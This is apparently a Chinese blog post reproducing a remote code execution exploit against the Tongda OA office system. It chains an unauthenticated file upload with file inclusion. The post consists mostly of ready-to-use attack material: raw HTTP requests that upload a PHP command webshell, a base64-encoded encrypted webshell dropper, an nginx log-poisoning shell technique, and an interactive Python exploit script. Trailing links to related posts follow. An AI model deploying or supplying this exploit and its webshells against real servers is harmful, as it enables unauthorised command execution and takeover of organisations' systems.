[通达OA] RCE + Getshell
跟着大佬轻松复现:https://github.com/jas502n/OA-tongda-RCE
通达OA下载:https://www.tongda2000.com/download/2019.php
傻瓜式安装,不作多介绍。
漏洞原因:未授权文件上传 + 文件包含(利用nginx日志也可以getshell)
版本不同路径不同
2013:
- 文件上传路径:/ispirit/im/upload.php
- 文件包含路径:/ispirit/interface/gateway.php
2017:
- 文件上传路径:/ispirit/im/upload.php
- 文件包含路径:/mac/gateway.php
复现过程
文件上传
抓取数据包使用Burp改成POST,再改成 from-data 就好了
Request:
POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.95.129
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.95.129/logincheck.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=gb4tpaqrsagb3fcmpu9sco48m5; KEY_RANDOMDATA=13319
Connection: close
Content-Type: multipart/form-data; boundary=--------1673801018
Content-Length: 558
----------1673801018
Content-Disposition: form-data; name="UPLOAD_MODE"
2
----------1673801018
Content-Disposition: form-data; name="P"
123
----------1673801018
Content-Disposition: form-data; name="DEST_UID"
2
----------1673801018
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg
<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
----------1673801018--
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Mar 2020 14:03:32 GMT
Content-Type: text/html; charset=gbk
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=123; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Length: 37
+OK [vm]252@2003_225735032|jpg|0[/vm]
文件包含
注意对应成功上传的文件名
Request:
POST /ispirit/interface/gateway.php HTTP/1.1
Host: 192.168.95.129
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.95.129/logincheck.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=gb4tpaqrsagb3fcmpu9sco48m5; KEY_RANDOMDATA=13319
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
json={"url":"/general/../../attach/im/2003/225735032.jpg"}&cmd=net user
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Mar 2020 14:06:54 GMT
Content-Type: text/html; charset=gbk
Connection: close
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Content-Length: 192
\\ 的用户帐户
-------------------------------------------------------------------------------
Administrator Guest
命令运行完毕,但发现一个或多个错误。
Getshell
<?php
$fp = fopen('readme.php', 'w');
$a = base64_decode("PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9HRVRbJ3Bhc3MnXSkpCnsKICAgICRrZXk9c3Vic3RyKG1kNSh1bmlxaWQocmFuZCgpKSksMTYpOwogICAgJF9TRVNTSU9OWydrJ109JGtleTsKICAgIHByaW50ICRrZXk7Cn0KZWxzZQp7CiAgICAka2V5PSRfU0VTU0lPTlsnayddOwoJJHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7CglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQoJewoJCSR0PSJiYXNlNjRfIi4iZGVjb2RlIjsKCQkkcG9zdD0kdCgkcG9zdC4iIik7CgkJCgkJZm9yKCRpPTA7JGk8c3RybGVuKCRwb3N0KTskaSsrKSB7CiAgICAJCQkgJHBvc3RbJGldID0gJHBvc3RbJGldXiRrZXlbJGkrMSYxNV07IAogICAgCQkJfQoJfQoJZWxzZQoJewoJCSRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpOwoJfQogICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7CiAgICAkZnVuYz0kYXJyWzBdOwogICAgJHBhcmFtcz0kYXJyWzFdOwoJY2xhc3MgQ3twdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJHApIHtldmFsKCRwLiIiKTt9fQoJQG5ldyBDKCRwYXJhbXMpOwp9Cj8+");
fwrite($fp, $a);
fclose($fp);
?>
通过上传上方webshell,进行文件包含,会在文件包含的根目录下生成一个 readme.php 文件。冰蝎的shell
http://127.0.0.1/ispirit/interface/readme.php
利用nginx日志来 getshell
抓取数据包来发送一句话木马代码,不能直接在浏览器访问,因为那样符号会被浏览器编码的
http://192.168.95.129/ispirit/interface/gateway.php?json={"url":"/general/../../nginx/logs/oa.access.log"}
用 C 刀(菜刀)就可以直接连接了,蚁剑不行。
Python 脚本
改造计划:https://www.t00ls.net/viewthread.php?tid=55458
模仿大佬:https://github.com/jas502n/OA-tongda-RCE
import requests,sys
def poc():
global url
upload = url+"/ispirit/im/upload.php"
cmdshell = """
<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
"""
files = {"ATTACHMENT": cmdshell}
upload_post = {
"UPLOAD_MODE":2,
"P":123,
"DEST_UID":2
}
r = requests.post(upload,upload_post,files=files)
path = r.text
path = path[path.find('@')+1:path.rfind('|')].replace("_","/").replace("|",".")
return path
def exp():
global url
path = poc()
headers = {
"Content-Type":"application/x-www-form-urlencoded"
}
include = url+"/ispirit/interface/gateway.php"
while 1:
cmd = input("$ ")
include_post = 'json={"url":"/general/../../attach/im/'+path+'"}&cmd=%s' % cmd
req = requests.post(url=include, data=include_post,headers=headers)
print(req.text)
if cmd == 'exit':
break
if __name__ == '__main__':
try:
url = sys.argv[1]
print("""
______ ___ ____ ____ ___ ____ ____ __ ___
| | / \ | \ / | | \ / | | \ / ] / _]
| || || _ || __| | \ | o | | D ) / / / [_
|_| |_|| O || | || | | | D || | | / / / | _]
| | | || | || |_ | | || _ | | \ / \_ | [_
| | | || | || | | || | | | . \\ || |
|__| \___/ |__|__||___,_| |_____||__|__| |__|\_| \____||_____|
""")
poc()
exp()
except:
print("python "+sys.argv[0]+" http://127.0.0.1")
[通达OA] RCE + Getshell的更多相关文章
- 通达OA rce复现
通达OA下载:链接:https://pan.baidu.com/s/1c0P-M-IyY5VxfH5d0qKHsQ 提取码:l0pc 漏洞原因:未授权文件上传 + 文件包含(利用nginx日志也可以g ...
- 通达OA后台getshell
GIF演示图 https://github.com/jas502n/OA-tongda-RCE/blob/master/Auth-Getshell.gif 1.通过弱口令或其它手段进入后台 2.选择 ...
- 通达OA任意文件上传+文件包含GetShell/包含日志文件Getshell
0x01 简介 通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠.数据存取集中控制,避免了数据泄漏的可能.提供数据备份工具,保护系统数据安全.多级 ...
- 通达OA 免狗迁移到公网 的另类解决办法
1,通达OA 发布到公网 ,要真正的 Anywhere2,正版通达OA,有加密狗在本地机器上 ,通达必须检测有狗才可以运行3,阿里云服务器 (你想往上插加密狗都没地方的说..汗)4,本地ISP 不提 ...
- 通达OA 同步中控考勤机 增强版
如果你用的是中控考勤机且考勤机能联网,那恭喜有福了! 最近发现考勤机提供web方式查询,经过调试可以用程序直接读取考勤机数据跨过考勤机软件及其access数据库,数据同步及时性.可靠性大幅提高. 通达 ...
- 通达OA 指纹考勤机接口 源代码
通达oa2011已经支持 指纹考勤机 但只限中控iclock660 这款2000大洋的型号 通过本文的开发接口,可以与任意一款指纹机集成, 需求指纹机管理软件能实时保存数据 我这里用的是 中控u16 ...
- 思道OA PK 通达OA 同场竞技 谁与争锋
技术架构 思道OA 通达OA 开发语言 微软ASP.NET 4.0 PHP开源脚本语言 64位平台 64位 32位 数据库 SQL Server大数据库 MySQL开源数据库 官网下载 下载地址 下载 ...
- 如何在同一台服务器上安装多套通达OA
本人最近研究了在同一服务器安装多套通达OA的方法:发现网上关于这个话题的文章比较少,于是录制成视频,在此发布,希望对有这方面需求的朋友有所帮助: http://blog.163.com/zhuwei_ ...
- 通达OA 小飞鱼工作流在线培训教程文件夹及意见征集
最近通达OA技术交流群有不少朋友反映说表单设计这块 改动样式的问题,这块须要html和css的改动.本来最近正好要在工作流这块准备做一个系列的课程,都是基础的设置主要是给刚接触工作流的朋友用的,大家有 ...
随机推荐
- 牛客练习赛70 A.重新排列 (,字符串思维)
题意:有一个模板串,给你\(T\)个字符串,选取最短的子串,使其重新排列后包含模板串,求最短的子串的长度 题解:遍历字符串,记录每个字符出现的最后位置,每记录一个后再遍历子串,找到子串需要的所有的字符 ...
- K8S(09)交付实战-通过流水线构建dubbo服务
k8s交付实战-流水线构建dubbo服务 目录 k8s交付实战-流水线构建dubbo服务 1 jenkins流水线准备工作 1.1 参数构建要点 1.2 创建流水线 1.2.1 创建流水线 1.2.2 ...
- LEETCODE - 【1271】十六进制魔术数字
class Solution { public: string toHexspeak(string num) { stringstream ss; long long inter; //转16进制 s ...
- docker镜像拉取、运行、删除
1.拉取hello-world镜像并运行 docker pull hello-world 拉取hello-world镜像Using default tag: latestlatest: Pulling ...
- C++模板沉思录
0 论抽象--前言 故事要从一个看起来非常简单的功能开始: 请计算两个数的和. 如果你对Python很熟悉,你一定会觉得:"哇!这太简单了!",然后写出以下代码: def Plus ...
- HTML a Tag All In One
HTML a Tag All In One HTML <a> target https://developer.mozilla.org/en-US/docs/Web/HTML/Elemen ...
- JSON-LD & SEO
JSON-LD & SEO https://json-ld.org/ https://en.wikipedia.org/wiki/JSON-LD Google Search structure ...
- js 金融数字格式化
js 金融数字格式化 finance money number format 数字格式化 regex `123456789`.replace(/\B(?=(\d{3})+(?!\d))/g, ',') ...
- macOS 录屏 gif
macOS 录屏 gif LICEcap bug 授权问题? 如何在 Mac 上录制屏幕 https://support.apple.com/zh-cn/HT208721 Command + Shif ...
- user tracker with ETag
user tracker with ETag 用户追踪, without cookies clear cache bug 实现原理 HTTP cache hidden iframe 1px image ...